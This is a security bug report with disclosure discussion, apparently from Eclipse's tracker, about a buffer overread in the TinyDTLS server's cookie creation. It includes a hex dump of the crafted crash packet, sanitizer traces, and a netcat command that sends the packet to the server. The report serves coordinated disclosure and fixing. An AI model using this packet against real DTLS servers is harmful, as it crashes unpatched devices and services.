Community
Participate
Working Groups
Created attachment 277690 [details] DTLS packet causing crash TinyDTLS DTLS server incorrectly handles incoming network messages leading to buffer overread and crash of the server. After processing crafted packet server incorrectly handles fragment length value provided in DTLS handshake message. Function dtls_create_cookie runs dtls_hmac_update with ilen value larger than size of input buffer (in example server allocated as global static buffer of fixed size). That leads to crash of the whole DTLS server via SIGSEGV signal. Proposed CVSS 3.0 score: 7.5 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Error message WITHOUT Address Sanitizer: -------------------------------------------------------------------------------------- ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10 Feb 26 12:34:15 DEBG got 80 bytes from port 42443 Feb 26 12:34:15 DEBG dtls_handle_message: PEER NOT FOUND Feb 26 12:34:15 DEBG peer addr: [...]:42443 Feb 26 12:34:15 DEBG got packet 22 (77 bytes) Feb 26 12:34:15 DEBG receive header: (13 bytes): 00000000 16 FE FD 00 A7 F6 40 58 00 40 FF 00 40 Feb 26 12:34:15 DEBG receive unencrypted: (64 bytes): 00000000 01 F6 40 42 4D 00 00 00 00 80 00 3F 3F 3F 3F 3F 00000010 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 00000020 3F 3F 3F 3F 3F 3F 3F 3F 3F 40 16 16 FE FD 00 00 00000030 00 0E 00 4D 00 00 40 16 F6 40 01 00 00 00 58 4D Feb 26 12:34:15 DEBG received handshake packet of type: client_hello (1) Feb 26 12:34:15 DEBG handle handshake packet of type: client_hello (1) Segmentation fault -------------------------------------------------------------------------------------- Error message WITH Address Sanitizer: -------------------------------------------------------------------------------------- ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10 Feb 26 11:36:02 DEBG got 80 bytes from port 51555 Feb 26 11:36:02 DEBG dtls_handle_message: PEER NOT FOUND Feb 26 11:36:02 DEBG peer addr: [...]:51555 Feb 26 11:36:02 DEBG got packet 22 (77 bytes) Feb 26 11:36:02 DEBG receive header: (13 bytes): 00000000 16 FE FD 00 A7 F6 40 58 00 40 FF 00 40 Feb 26 11:36:02 DEBG receive unencrypted: (64 bytes): 00000000 01 F6 40 42 4D 00 00 00 00 80 00 3F 3F 3F 3F 3F 00000010 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 00000020 3F 3F 3F 3F 3F 3F 3F 3F 3F 40 16 16 FE FD 00 00 00000030 00 0E 00 4D 00 00 40 16 F6 40 01 00 00 00 58 4D Feb 26 11:36:02 DEBG received handshake packet of type: client_hello (1) Feb 26 11:36:02 DEBG handle handshake packet of type: client_hello (1) dtls_get_fragment_length(DTLS_HANDSHAKE_HEADER(msg)) - e = 8388635 ================================================================= ==24848==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000062e5da at pc 0x00000041d8f8 bp 0x7ffd6deabc50 sp 0x7ffd6deabc40 READ of size 4 at 0x00000062e5da thread T0 #0 0x41d8f7 in dtls_sha256_transform tinydtls_0.9/sha2/sha2.c:494 #1 0x41dd44 in dtls_sha256_update tinydtls_0.9/sha2/sha2.c:587 #2 0x4156df in dtls_hash_update tinydtls_0.9/hmac.h:61 #3 0x4156df in dtls_hmac_update tinydtls_0.9/hmac.c:73 #4 0x40b6c6 in dtls_create_cookie tinydtls_0.9/dtls.c:385 #5 0x40b6c6 in dtls_verify_peer tinydtls_0.9/dtls.c:1697 #6 0x40b6c6 in handle_handshake_msg tinydtls_0.9/dtls.c:3390 #7 0x4102b0 in handle_handshake tinydtls_0.9/dtls.c:3549 #8 0x4102b0 in dtls_handle_message tinydtls_0.9/dtls.c:3936 #9 0x402dc9 in dtls_handle_read tinydtls_0.9/tests/dtls-server.c:177 #10 0x402dc9 in main tinydtls_0.9/tests/dtls-server.c:352 #11 0x7f97890e582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x401ba8 in _start (tinydtls_0.9/tests/dtls-server+0x401ba8) 0x00000062e5da is located 38 bytes to the left of global variable 'addrstr' defined in 'dtls-server.c:185:15' (0x62e600) of size 256 0x00000062e5da is located 2 bytes to the right of global variable 'buf' defined in 'dtls-server.c:154:16' (0x62e060) of size 1400 SUMMARY: AddressSanitizer: global-buffer-overflow tinydtls_0.9/sha2/sha2.c:494 dtls_sha256_transform Shadow bytes around the buggy address: 0x0000800bdc60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000800bdcb0: 00 00 00 00 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 0x0000800bdcc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdce0: f9 f9 f9 f9 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 0x0000800bdcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000800bdd00: 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 00 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==24848==ABORTING -------------------------------------------------------------------------------------- Reproduction: 1. Compile tinydtls with Address Sanitizer by enabling compilation flag: -fsanitize=address (using ASAN is not mandatory for reproduction, but gives more information about crash). 2. Run DTLS server: ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10 3. Send attached crafted message e.g. using netcat: netcat -u $IP 5555 < crash_001_dtls_create_cookie.raw where $IP is IP of test server
We have postponed release of payload for this vulnerability in Cotopaxi framework (https://github.com/samsung/cotopaxi). Please provide any information, when this issue will be fixed. If there be no response for 90 days from report date (26th of February 2019), we will release it to public.
Project team, there's help in the handbook regarding how we deal with vulnerability reports. https://www.eclipse.org/projects/handbook/#vulnerability
Please provide any information, when this issue will be fixed. We will release findings to public before Black Hat USA (August 2019).
I've removed the "committers only" flag to disclose per the security policy.
This bug has been fixed in https://github.com/eclipse/tinydtls/commit/68a1cdaff9e329e13ea59529f1eb61b05632c297 This is currently in the develop branch and will be merged into master as well.
Please register this issue in CVE database.
This vulnerability affects following versions of tinydtls: - 0.9 (master) - 0.8.2 - 0.8.1 - 0.4.0 - 0.3.1
